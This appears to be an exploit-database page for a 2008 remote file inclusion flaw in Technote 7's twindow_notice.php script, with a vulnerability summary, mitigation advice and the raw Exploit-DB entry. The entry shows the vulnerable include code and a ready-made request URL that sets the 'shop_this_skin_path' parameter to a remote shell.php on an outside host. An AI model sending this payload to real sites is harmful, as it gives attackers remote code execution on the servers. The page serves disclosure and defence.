header-logo
Suggest Exploit
vendor:
Technote 7
by:
webDEViL
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Technote 7
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Technote 7 Remote File Inclusion

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'shop_this_skin_path' parameter of 'twindow_notice.php' script. A remote attacker can send a specially crafted HTTP request with malicious code in the 'shop_this_skin_path' parameter and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be performed to ensure that untrusted input is rejected. Sanitize all user-supplied input to prevent any type of injection attack.
Source

Exploit-DB raw data:

#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------Technote 7 Remote File Inclusion------------------------#
# ----------developers site: http://www.technote.co.kr--------------#

bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php

...snip...
$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray";
...snip...
include_once "$TWIN_SET[dir_path]/frame_design.php";

http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php?

# milw0rm.com [2008-09-17]

Navigation

Suggest Exploit

Services By CQR